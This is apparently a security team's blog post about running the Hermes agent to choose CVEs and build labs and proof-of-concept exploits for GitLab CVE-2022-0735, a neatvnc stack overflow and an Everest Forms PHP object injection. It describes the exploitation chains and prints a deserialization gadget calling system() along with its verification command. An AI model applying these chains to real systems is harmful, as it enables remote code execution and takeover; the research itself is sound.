We hit record on the CVE Demo video and only then realized we hadn't picked a CVE.

Most weeks we'd already have a candidate queued up - the EIP MCP server runs all day, and we triage targets on our own time. But the video was already rolling, the agent was waiting, and stopping to pick one off-camera would have been the wrong kind of edit. So we improvised. We typed:

Can you please use the eip-mcp to search for interesting candidates for cve research and poc creation. We're looking for well known, open-source projects, with no existing exploits in eip. What interesting candidates can you find?

The agent goes to work. A minute later it comes back with nine CVEs, ranked into three tiers, every one annotated with CVSS, EPSS, pre-auth status, exploitation strategy, source-code availability. Then a recommendation:

My top pick would be CVE-2022-0735 - CVSS 10.0, no exploit, pre-auth, clear exploitation path (steal token → rogue runner RCE), and GitLab source is fully available.

Want me to start the CVE workflow on any of these? Pick one and I'll load cve-router-triage and begin.

We type back four words:

I love your pick.

It loads the first skill and starts running.

We have been doing this work for a few months. We have never typed "I love your pick" at any part of it before. We also have never improvised our way into a CVE pick on camera before. Hermes did not flinch at either.

This is what working with Hermes feels like. The pipeline itself is autonomous - same shape as the forge tools we've been running for months. But when something messy happens at the edges of the work - an improvised target, a clarifying question, a follow-up two hours after the run completes - the agent stays in the conversation. By the time the run finishes, it will have built a Docker lab, extracted a runner token from the GitLab API, registered a rogue runner, demonstrated RCE, written a disclosure draft, and updated its own skill library with what it learned. All of it inside one conversation we can still talk to.

This post is about what that small but profound shift unlocks.

What we'd been doing

A quick recap, because the contrast matters.

We've built a stack of autonomous forge tools - CVEForge for end-to-end exploit development, StackForge for binary exploitation, FuzzForge for source fuzzing, and an internal durable pipeline that wraps them in Temporal. All of those started as forks of Shannon - the foundation we keep coming back to, the project that taught us what an autonomous research pipeline could look like.

The autonomous-dispatch model is genuinely powerful. We've used it to run 24 CVEs in 72 hours , to ship zero-to-RCE results across three vulnerability classes , to take xrdp from crash to RIP control - and eventually to a shell . The autonomy is the feature. When you have 24 CVEs to grind through overnight, you do not want a chat window in the loop.

That's not going anywhere. We still use it. This post isn't about replacing it.

The shape we wanted

There's a different mode of work, though. The one we keep falling into when a single CVE turns out to be hard.

In that mode, you're not dispatching a job. You're doing research. You want to see the candidate list before the agent commits to one. You want to peek at the intel brief and ask why it ranked that bug above the other one. When the PoC lands, you want to discuss what it implies before the pipeline charges into the report phase. And when the run is over, you want to keep poking - what if we try this over WebSocket? What about the same RPC interface on Server 2022? Could a defender catch this in the logs? The agent should still be there, with everything it just learned, ready to keep going.

The conversational thread is the thing. Not less autonomy - additional addressability. And after the run lands, persistence.

Hermes , the self-improving agent runtime by Nous Research , gives us exactly that.

What Hermes is

A quick technical sketch, because the architecture is the point.

Hermes is an agent runtime. You install it locally - there's a gateway process, a dashboard, a Kanban board for task tracking, a persistent session store. The agent talks to a model (we run a local Ollama for short hops and an upstream model for the heavy work) and pulls context from a Honcho memory backend, which gives it long-term recall across sessions.

There are three persistence layers worth naming:

  1. SOUL.md - a single file that defines the agent's personality and tone. Edit it, the agent's voice changes on the next message. No restart.
  2. ~/.hermes/memories/MEMORY.md and USER.md - auto-memory the agent maintains itself. After a long session, the agent reviews what was learned and writes it back here. Next session starts with that context already loaded.
  3. ~/.hermes/sessions/*.json - full conversation transcripts, retained. You can resume any past session and keep going.

Then there are skills - modular instruction packages that Hermes loads on demand. The CVE pipeline ships as a tree of skill files inside eip-hermes itself: cve-router-triage, cve-web-generic, cve-memory-linux, cve-poc-validation, cve-report-disclosure. When the agent decides a task fits a skill, it loads it. When it's done, it hands off to the next skill with a structured block - the same === SKILL HANDOFF === we showed in the cold open.

MCP is wired in by default. The agent has eip-mcp for vuln intelligence, semgrep for static analysis, ghidra-headless-mcp for binary work. Add more by dropping config; the agent picks them up.

We stood all of this up with one installer - eip-hermes . One bootstrap script for sudo, one drop-in install.sh for the control plane, the skills, the MCP wiring, and the security toolchain. Ubuntu 24.04 host. Native services bind 127.0.0.1. The whole control plane runs as a regular user under ~/.hermes/.

A note on scope: our eip-hermes setup is intentionally minimal. The default plan brings up the control plane, the skills, the MCP wiring, and a local Ollama; it does not yet integrate Open WebUI, Langfuse, the mcpo OpenAPI bridge, Multica, or several other Hermes-ecosystem components that the broader community has been wiring in. If you want a richer view of what Hermes can be, Akshay Pachaar's community walkthrough on X is the best single tour we've found, and a much fuller setup than ours. We treat ours as a clean, reproducible baseline for CVE research; everything else is improvement space.

Part 1 of our own three-part video series walks through the eip-hermes install end to end on a fresh Ubuntu 24.04 host - what gets installed, where it lives, and how to verify the control plane comes up clean:

That's the runtime. Now the runs.

Run 1: CVE-2022-0735 - GitLab info-disclosure to RCE

The cold open above is the actual start of this run. What we didn't show was everything before "I love your pick" - the boring but important warm-up. We opened with a tool healthcheck ("do a quick mcp tool healthcheck, and make sure you are familiar with our eip-skills and their ROUTING-DOCTRINE.md"), then asked Hermes to use the EIP MCP server to surface CVEs worth working on. The nine-CVE tiered shortlist came out of that. The recommendation was its.

The vulnerability itself is a beauty: an authenticated GET against GitLab CE 14.8.1's project API returns the runners_token in the JSON response - to any logged-in reader of the project, which on a public project is anyone willing to create a free user account and claim the Reporter role. With that token, an attacker registers a rogue GitLab Runner that picks up CI jobs and executes arbitrary code. CVSS 10.0. Patched in 14.8.2.

(The upstream advisory rates the CVE PR:N based on a separate /api/v4/projects/:id/notes quick-actions vector that was reachable anonymously on older versions in the affected range. On the 14.8.1 build we used, both that vector and the projects-detail field had already been hardened against anonymous callers; the lab demonstrates the Reporter-level path that was still open in 14.8.1. We confirmed this with a direct probe during smoke-testing. The agent's "pre-auth" tag in the shortlist above was optimistic for this specific build.)

After "I love your pick," Hermes ran. Intel brief, lab setup, PoC development, verification, disclosure draft - the same craft our internal CVEForge embodies, kicked off by a target we'd improvised our way into thirty seconds earlier.

The full lab and PoC are published at eip-pocs-and-cves/CVE-2022-0735/ - one docker compose up -d, one bash seed.sh, one python3 poc/poc.py http://127.0.0.1:8080 <api_token> and you're at the same place. Final artifacts in ~/exploit-intel/labs/CVE-2022-0735/:

INTEL.md           - full CVE intel block with root cause analysis
lab/
  docker-compose.yml
  seed.sh
poc/exploit.py     - API leak → token theft → runner registration → RCE
artifacts/
  token-leak.txt   - captured runners_token sEjRS5wgFVtg95Wpmyzu
  response-leak.json
  runners-list.json - rogue runner #2 registered
  container-logs.txt
report.md          - verdict: [SUCCESS], full chain demonstrated

The agent improves itself

Then the part that matters most for this whole post. After the run completed, we asked Hermes to do something the batch-dispatch model structurally cannot do - look back at the session it just ran and improve its own documentation.

The prompt is explicit about the signals to look for: places where the user corrected the agent's workflow or format, places where a non-trivial technique emerged, places where a skill that was loaded turned out to be wrong or missing a step, places where the agent and the user felt friction. Every one of those is a candidate for a skill update.

Review the conversation above and update the skill library. Be ACTIVE - most sessions produce at least one skill update, even if small. A pass that does nothing is a missed learning opportunity, not a neutral outcome.

... Signals to look for: User corrected your style, tone, format, legibility, or verbosity ... User corrected your workflow, approach, or sequence of steps ... Non-trivial technique, fix, workaround, debugging path, or tool-usage pattern emerged that a future session would benefit from ... A skill that got loaded or consulted this session turned out to be wrong, missing a step, or outdated. Patch it NOW.

This is what Nous Research calls self-improving agents - the framing they put right at the top of the hermes-agent README . It is not a side feature; it is central to how Hermes is meant to be used. The agent reads its own session as a critic. It looks at what it actually did, what it actually said, where the human pushed back. Then it picks the right level to write the lesson back into: patch a currently-loaded skill, broaden an existing umbrella, add a references/ file under an existing skill, or - last resort - create a new class-level umbrella.

Look at what is not happening in that loop. Nobody is updating a Confluence page that will be archived without being read. Nobody is filing a "lessons learned" ticket that gets triaged into a backlog the team will spelunk through six months from now. The lesson goes back into the place the agent will actually consult the next time it does the work.

For this session, Hermes reviewed its own 240-message run, identified what was new - the runners-token primitive, the docker-compose pattern for GitLab CE labs, the specific shape of the quick_actions_status API response, the chain from leak to runner registration to CI RCE - and wrote it into the skill library. The next time we hand it a GitLab CVE, it starts with that. The next time we hand it any CVE that involves an authenticated API leaking a privileged token, it starts with that too.

The whole chain - from "find me a CVE" to "the agent knows more than it did before" - lived inside one conversation.

Part 2 of the video series is the source for the cold open above: the quick MCP healthcheck, the improvised candidate search through the EIP MCP server, the agent's tiered shortlist, and the run starting on CVE-2022-0735:

Run 2: CVE-2026-42859 - neatvnc pre-auth stack overflow

CVE-2026-42859 is a pre-authentication stack buffer overflow in neatvnc's RSA-AES handshake. rsa_aes_send_challenge() declares uint8_t buffer[1024] on the stack, then calls crypto_rsa_encrypt() with the attacker-controlled RSA key size as the output buffer length. Send a 65536-bit RSA public key during the VNC handshake and you overflow the stack by seven kilobytes before any credentials are checked. CVSS v4 8.1. Patched in 0.9.6.

Unlike the GitLab run, this one was deliberate. We had a CVE in mind. We went to exploit-intel.com , plugged the ID into the search bar, landed on the CVE page , read the GHSA advisory, and decided the impact statement was ambiguous enough to be worth a real look. The kind of thing you flag at the start of a research day, not the kind you stumble into on camera. By the time we opened Hermes, the homework was done. The agent was getting a target, not a question.

Where the GitLab run was a conversation, this one was a dispatch. We gave Hermes the right framing up front and let it run:

Good afternoon Hermes. I would like to pass CVE-2026-42859 down the CVE pipline. This is a memory corruption vulnerability, so build the lab with the least restrictive memory protections. Good luck!

That session went 316 model turns on two user messages, in about forty minutes wall-clock. We were not in the room for most of it. Build the lab. Compile neatvnc with -fno-stack-protector. Trigger the overflow. Confirm RIP overwrite. Document the exact byte offset, the saved-RBP location, the start of the canary-less stack frame. Write up checksec for the binary (NX on, PIE on, RELRO full, CET on, canary disabled - by design for this lab). File the disclosure with an honest impact-boundary section. Hand off.

That's dispatch autonomy from the same runtime that hosted the GitLab conversation an hour earlier. Same agent. Different shape of task.

The build alone surfaced a museum-grade collection of the small humiliations an aging C codebase reserves for new contributors. The neatvnc v0.9.5 source has have_working_h264_encoder() calling functions that are undefined when H.264 is disabled. The aml dependency needs ≥ 0.3.0 and Ubuntu 22.04 ships 0.2.1. The API renamed several functions between releases - nvnc_open() vs nvnc_new(), nvnc_enable_auth() vs nvnc_set_auth_fn(). AML_UNSTABLE_API=1 must be defined before including aml.h. RSA-AES type 5 and type 129 are only offered if NVNC_AUTH_REQUIRE_AUTH is set.

Hermes worked through all of it. And then - and this is the part we keep coming back to - it wrote it down. From ~/.hermes/memories/MEMORY.md on the lab host, the morning after the run:

CVE-2026-42859 (neatvnc v0.9.5 RSA-AES stack overflow) build pitfalls:
- aml dependency needs >=0.3.0; Ubuntu 22.04 only has 0.2.1.
  Fix: add subprojects/aml.wrap pointing at https://github.com/any1/aml.git
  branch v0.3.0, or build aml from source before neatvnc.
- v0.9.5 has a build bug: `have_working_h264_encoder()` in src/server.c line 123
  calls h264_encoder_create/destroy which are undefined when h264 is disabled.
  Fix: wrap that function in `#ifdef ENABLE_OPEN_H264 ... #endif`.
- neatvnc v0.9.5 API: `nvnc_open()` not `nvnc_new()`, `nvnc_enable_auth()` not
  `nvnc_set_auth_fn()`, `nvnc_fb_new()` not `nvnc_frame_new()`. Must define
  AML_UNSTABLE_API=1 before including aml.h.
- Server must have NVNC_AUTH_REQUIRE_AUTH set for RSA-AES (type 5) or
  RSA-AES256 (type 129) to be offered. Without auth, server only offers
  RFB_SECURITY_TYPE_NONE.
- Vulnerable function: rsa_aes_send_challenge() - uint8_t buffer[1024] on
  stack, overflow via oversized client RSA public key in crypto_rsa_encrypt()
  call.

The next time we put neatvnc anywhere near this agent - or anything aml-shaped, anything with that API rename pattern - it starts with that. The hour we spent paying tuition on the build is not a tax we pay again.

And here is the thing that lands harder the second or third time you do this with Hermes: what the agent delivered isn't an exploit. It is the part of the work you would otherwise spend a morning grinding through to get to. A working lab with the right vulnerable build. A reproducible crash. A documented PoC with its constraints labeled honestly. A docker-compose that survives a down -v. Forty minutes after lock-in, with no public exploit to copy from, all that remains is to start digging into the vulnerability. That part - the digging - is still ours.

The full neatvnc lab is published at eip-pocs-and-cves/CVE-2026-42859/ . The Dockerfile clones the vulnerable v0.9.5 tag at build time and applies one small build-fix patch. PoC, artifacts, and vuln-server.c are all in the repo.

Part 3 of the video series walks through the full neatvnc run end to end - the lab build, the overflow trigger, and the 316-turn autonomous chase that ends with the server process aborting on __stack_chk_fail (DoS confirmed; RIP overwrite needs the library rebuilt without the canary, see the README):

Run 3: CVE-2026-3296 - Everest Forms PHP Object Injection

The pick this time was driven by the VulnCheck KEV list . CVE-2026-3296 landed on KEV on 2026-05-04, actively exploited in the wild, against a WordPress plugin (Everest Forms) with a six-figure active install base. The patch is the kind of thing that makes you want to read the diff yourself: a single function-call swap in one PHP file. Raw unserialize($meta_value) becomes evf_maybe_unserialize($meta_value). The safe wrapper, which passes ['allowed_classes' => false], was already in the same codebase. A past maintainer wrote it. Then everyone forgot to use it on the admin entry-view page.

The vulnerability class is PHP Object Injection (CWE-502). When an administrator opens the Everest Forms entries page, the plugin loops over each entry's stored meta values, runs is_serialized(), and calls raw unserialize() on anything that looks serialized. Any class loaded into the WordPress process becomes an instantiation candidate. With a POP gadget present - any class whose __destruct, __wakeup, or __toString has side effects - the chain becomes RCE as the WordPress process user.

The attacker fully controls the serialized payload: which class to instantiate, every public or protected property on it, the order of instantiation for nested objects. What the attacker doesn't control is the set of classes available. That is a property of the WordPress install, not the bug.

That single fact made the lab design a real decision. To demonstrate RCE end to end, we needed a class with an exploitable magic method present in the WordPress process. Three options: depend on a WordPress core gadget chain (WP_Theme, WP_HTTP_Cookie, the Requests_* family) and pin the lab to specific core class shapes that drift across releases; depend on a real third-party plugin's gadget and pin two vulnerable plugins instead of one; or ship a manufactured companion plugin whose only job is to provide a class with an exploitable __destruct(), label it clearly as lab scaffolding in every artifact, and keep the Everest Forms demonstration decoupled from gadget-availability churn.

We picked option three. The lab ships SEO Rank Reporter 2.1.0 , a not-implausibly-shaped WordPress plugin whose Log_Cleanup class implements __destruct() { system($this->command); }. It is not on the WordPress.org plugin repository. It is not a real plugin. Every artifact in the CVE folder labels it as lab scaffolding. It exists because the CVE is a deserialization primitive, and primitives need targets.

Verification is the part this lab has the most pride in. The gadget runs system('id > /tmp/pwned_rce && hostname >> /tmp/pwned_rce && date >> /tmp/pwned_rce'). The PoC reads /tmp/pwned_rce back through a separate docker exec channel. The HTTP trigger response is a 500 (PHP throws a type error after __destruct() returns and the entries-view template tries to render the deserialized object as an associative array), but the 500 is not the signal: plenty of non-exploit things also produce a 500. The signal is a file that did not exist before the run, owned by www-data:www-data (proving PHP wrote it, not the host), containing uid=33(www-data), the container hostname, and a date matching this invocation (proving it ran this time, not residual state from a previous run). Five independent signals; all five must agree before the PoC declares [SUCCESS]. That kind of non-circular verification matters more on a deserialization bug than on most things - the temptation to call HTTP-500-after-trigger a success is real, and it would be wrong half the time.

The full lab is at eip-pocs-and-cves/CVE-2026-3296/ . The Dockerfile pulls Everest Forms 3.4.3 from downloads.wordpress.org at image-build time and stages WP-CLI for seeding. The seed.sh script is idempotent. The PoC is stdlib-only Python: urllib, http.cookiejar, ssl, subprocess. KEV listing 2026-05-04; discovery credit 0xsabre .

Part 4 of the video series walks through the full Everest Forms run end to end - the lab build, the gadget-plugin reasoning, the payload injection, and the out-of-band verification firing:

The persistence is the unlock

Look at what just happened across the three runs.

In the GitLab session, Hermes turned a hot-mic improvisation into a clean target pick, ran the whole pipeline, and - after the work was done - reviewed its own session and updated its own skill library with what it had learned. The API leak pattern. The docker-compose layout. The runner registration sequence. Next session starts there.

In the neatvnc session, Hermes ran 316 turns on two user messages - the same level of autonomy our batch pipelines give us - and left behind a structured set of build notes that the agent itself reads on the next neatvnc-adjacent run. Next session starts there too.

In the Everest Forms session, Hermes pulled a KEV-listed CVE off the watchlist, made a sharp lab-design call we'd otherwise have had to spell out by hand (the manufactured gadget plugin instead of a brittle WordPress-core dependency), and shipped a non-circular verification model that the next deserialization-class CVE inherits for free. Next session starts there too.

That's the part the autonomous-dispatch model structurally can't do. A fire-and-forget pipeline finishes, drops a report, and dies. The next run starts cold - same prompts, same skills directory, same fresh agent. Any institutional memory has to be hard-coded into the skill files between runs, by us, manually.

Hermes inverts it. The skills are still there as the canonical instruction set, but the agent maintains its own memory layer on top - MEMORY.md, USER.md, the session JSONs, the Honcho long-term store, and the skill-handoff blocks that flow between pipeline stages with structured state. Every run leaves the next run smarter.

This is what we actually mean when we say "research assistant" instead of "pipeline." A pipeline is something you run. An assistant is something that knows you, and the work, and last week's mistake.

"Won't memory get bogged down across runs?"

A fair question, and one the Hermes folks clearly thought about before we did.

The short answer: new sessions don't get the whole archive jammed into context. The standing context for a fresh session is small - SOUL.md, the MEMORY.md and USER.md auto-memory files (on our box they total under 2 KB), plus whatever skill the agent loads for the task at hand. Session transcripts sit on disk for retrieval, not for auto-injection. The Honcho backend retrieves on relevance, not by dumping every prior memory in.

The structural answer: Hermes ships with a curator. It's an auxiliary-model background process that wakes up when the agent has been idle for a couple of hours and the last curator run is older than interval_hours (7 days, by default), and reviews the agent-created skill collection. It can pin, archive, consolidate, or patch skills. Defaults out of the box: skills are flagged stale after 30 days of disuse and archived after 90. Pinned skills bypass auto-transitions. It never deletes, only archives, and archives are recoverable. The curator uses an auxiliary model client that doesn't share the main session's prompt cache, so its work can't pollute the conversation in progress.

The skill-update prompt we quoted earlier is the front-line filter: the agent is told explicitly NOT to capture environment-dependent failures, negative claims about tools that turned out to be fine, transient errors that resolved mid-session, or one-off task narratives. The curator is the longer-horizon backstop that catches what the front-line filter missed.

Most agent frameworks treat memory hygiene the way most landlords treat the heating: technically a feature, practically the tenant's problem. The Hermes curator is a first-class, scheduled, model-driven housekeeper that ships with the agent. Skills you've written by hand are off-limits to it. Skills the agent wrote can be pruned, but never destructively.

You still have to mind it. Auto-memory will accumulate stale facts; we treat that the way we'd treat a wiki - read it once in a while, prune the obvious. But the structural plumbing for "agent memory at scale" is already in place.

Pipelines as a verb, not a noun

The other thing worth naming: we did not throw away the pipeline.

The skills the agent loads in a Hermes session are recognizably the same craft we built into CVEForge. cve-router-triage for stage gating. cve-web-generic for HTTP-driven exploitation. cve-poc-validation for the verify pass. cve-report-disclosure for the writeup. Each one is a SKILL.md file with the same shape we've been refining for months - entry conditions, success criteria, artifact contracts, hand-off blocks.

What changed isn't the pipeline. It's the holder of the pipeline.

In the durable-CVE-pipeline model - and in CVEForge, StackForge, FuzzForge - the holder is a Temporal worker. It dispatches the skill, captures the output, hands it to the next worker, retries on failure, checkpoints state. The pipeline is a noun. A thing you start.

In Hermes, the holder is the agent you're talking to. Same skill files. Same artifact contracts. Same hand-off blocks. But the pipeline is now a verb - something the agent does, between or during the conversation it's having with you. The PoC isn't dropped at your feet; it's delivered, by someone who can answer questions about it.

That distinction sounds small. In practice it changes the entire shape of a research day.

Work that moved, not work that vanished

It's worth pausing on what that shift costs - or doesn't.

Our previous forge projects (CVEForge, StackForge, FuzzForge, and the internal durable pipeline) sit at roughly 30,000 lines of code between them, not counting the security toolchain or the lab orchestration. That's not bloat. It's what you need to be a good Temporal-backed orchestrator: stage gating, retry policies, checkpointing, durable timers, workflow versioning, activity contracts, observability hooks, cost tracking, resume logic, replay safety. Earning the word "durable" is real engineering. We'd build it again. For batch dispatch, we do still run it.

The Hermes version of the same pipeline boils down to a directory of skill files. One SKILL.md per stage, a references/ folder for the gnarly details, optional templates/ and scripts/ when a stage needs them. The hand-off contracts that the Temporal version encodes in TypeScript activity definitions are expressed here as a few lines of structured markdown. That is the whole orchestration layer.

We don't want to reduce 30k LoC of careful engineering to "you could've just written markdown" - that is not what happened, and it would not be fair to the work. What changed is the runtime that holds the pipeline. With Temporal as the holder, the orchestration intelligence has to live in code, because Temporal is a state machine, not a planner. With an LLM agent as the holder, the orchestration intelligence lives in the model itself, and the skills only need to encode the parts the model wouldn't get right on its own - the artifact contracts, the gate criteria, the gotchas, the conventions.

Watching a few months of careful engineering distill into a directory of markdown is humbling. It also clarifies what those months were really teaching us: not how to write a pipeline, but how to write the skills the next pipeline would need.

It's not less work. It's work that moved.

Worth saying clearly: every one of those forge projects has stayed inside the labs. eip-hermes - what we're calling the EIP Harness - is the first time EIP pipeline craft has shipped in public form. Same shape, distilled, in a tree of skill files anyone can clone, audit, and extend. We are publishing win11-forge alongside it, so the Windows kernel and usermode lab plumbing comes out of the box.

What it doesn't replace

Hermes is the right tool for active, focused research on a single CVE. It is not the right tool for everything we do.

When the job is "run 24 CVEs through the pipeline overnight and mail me the reports," we still reach for our internal forge tools - CVEForge, StackForge, FuzzForge, the durable pipeline. Those are batch dispatchers, and they want a job queue, not a conversation partner. The 72-hours-24-CVEs work would have taken substantially longer if every run paused to check in with us.

When the job is "we got a tip about a CVE class and want to sweep the EIP database for variants, then queue twenty exploit-dev runs," same answer. The conversational layer is wasted on a workflow where the human isn't planning to read the output until tomorrow morning.

We use both. The internal forge tools still grind through batches overnight. Hermes added the other half of the workflow - heads-down research mode on a single hard problem, with an agent that doesn't vanish at the end of the run.

Different tools for different shapes of work. Both autonomous. Only one of them stays at the keyboard.

Try it

Two of the six links below are shipping in public for the first time today.

  • eip-hermes (first public release) - the EIP Harness installer. One bootstrap script, one drop-in, Ubuntu 24.04. Brings up the Hermes control plane, the EIP CVE skill tree, the MCP wiring, and our security toolchain. MIT.
  • win11-forge (first public release) - the Windows lab and orchestration. Builds a Win11 24H2 gold image once; spawns kernel-debug lab pairs with live WinDbg MCP endpoints in minutes. Includes the skill library for Windows kernel and usermode CVE research. MIT.
  • eip-pocs-and-cves - our public collection of CVE labs and PoCs. The three CVEs from this post live at CVE-2022-0735/ , CVE-2026-42859/ , and CVE-2026-3296/ . Each entry is self-contained: Docker lab, stdlib-only PoC, intel brief, vulnerability analysis, verification report, build report, captured artifacts.
  • hermes-agent - the upstream agent itself, by Nous Research . MIT-licensed, self-improving, model-agnostic (works with Nous Portal, OpenRouter, NVIDIA NIM, OpenAI, local Ollama, or your own endpoint). Docs at hermes-agent.nousresearch.com . The thing this whole post is about.
  • Shannon - the autonomous-research framework every forge tool we've shipped (CVEForge, StackForge, FuzzForge, the durable pipeline) is a fork of. Different shape of agent than Hermes; sibling in our toolchain.
  • EIP MCP Server - 17 tools, real-time vulnerability intelligence, free, no API key.

Run ./bootstrap-user.sh then ./installers/hermes/install.sh, give the agent half an hour to come up, type "hi hermes", and ask it what it wants to work on. The first answer will probably be a tiered shortlist of CVEs, with a recommendation, and a question.

That's how research is supposed to feel.

(Yes, we've typed "pipline" a few times. Hermes has not once corrected our spelling. In this respect it is more polite than most colleagues.)


Related posts: